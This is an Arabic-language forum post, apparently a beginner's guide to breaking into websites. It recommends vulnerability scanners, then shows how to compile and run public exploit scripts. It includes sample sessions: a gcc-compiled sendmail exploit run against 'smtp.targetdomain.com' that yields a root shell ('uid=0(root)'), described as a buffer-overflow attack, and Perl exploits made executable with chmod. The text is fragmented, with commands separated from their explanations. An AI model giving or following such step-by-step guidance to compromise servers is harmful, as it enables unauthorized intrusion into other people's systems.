كيف نبحث عن ثغرات ...

كيف نبحث عن ثغرات ...

هذا الجزء أكبر من أن يوضع في كتاب ...... لذلك سوف أحاول أن أكتب هذا المقطع بالمختصر المفيد



هناك العديد من البرامج لمعرفة ثغرات الموقع ...

في الحقيقة برنامجي المفضل هو [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]



إن لم تجد في الموقعين إبحث هنا [ندعوك للتسجيل في المنتدى أو التعريف بنفسك لمعاينة هذا الرابط]





PHP - CGI - UNICODE - VB ... etc فاستغلالها يتم من المتصفح ...



إن وجدت سيكربتات مكتوبة بلغة السي لإستثمار ثغرة ما فاستخدامها كالتالي

أولا : قم بتحويلها إلى ملف تنفيذي بواسطة الأمر

gcc -o file file.c



gcc -o wuftpd-2.6.0 wuftpd-2.6.0.c



./wuftpd-2.6.0



$ gcc -o sendmail sendmail.c

$ ./sendmail

Usage : sendmail

$ ./sendmail smtp.targetdomain.com RedHat-6.2 anonymous anonymous

connecting to host...

connected...

id

uid=0(root) gid=0(root)





sendmail



بعد أن نفذنا هذا ... قام البرنامج بتنفيذ هجوم طفح الدارئ وأعطانا امتيازات root







./file.pl



Access Denied



chmod +x file.pl



هنا مثالين لملف قام بالعمل بشكل صحيح وآخر أظهر رسالة الخطأ المذكورة

$ ./apache.pl

Usage: apache



$ ./ftpd.pl

Access Denied.

$ chmod +x ftpd.pl

$ ./ftpd.pl

Usage:

host target host name

OS:

1 Linux Red Hat 6.2

2 OpenLinux 2.3

[so on]






بإمكانك أيضا استخدام البرنامج Nessus من الموقع



بعد العثور على ثغرة ما في موقع ... قم بالذهاب إلى أحد الموقعين التاليين





للبحث عن ثغرات للبرنامج ... إذهب للموقع الثاني أولا فهو أصغر ... إن لم تجد إذهب للأول فهو الأفضل والأكبر ...




لنترك البحث ونركز على الاستخدام ... إن كنت وجدت أحد هذه الثغرات







مثلا


وبعد أن يتم التحويل قم باستخدامها بالأمر


وسوف تظهر لك طريقة الإستعمال ... مثلا











لاحظ أن في هذه الثغرة طلب اسم ملقم البريد الذي يشغل برنامج


ونظام التشغيل وكذلك اسم مستخدم وكلمة مرور ...




قد تجد أحيانا سيكربت خاص بثغرة ما مكتوب بلغة Perl

استخدامه كالآتي


إن أعطاك الرسالة


اكتب الأمر


وقم بتشغيله مرة أخرى




كما ترى قام بالعمل بشكل صحيح ... لنرى المثال الآخر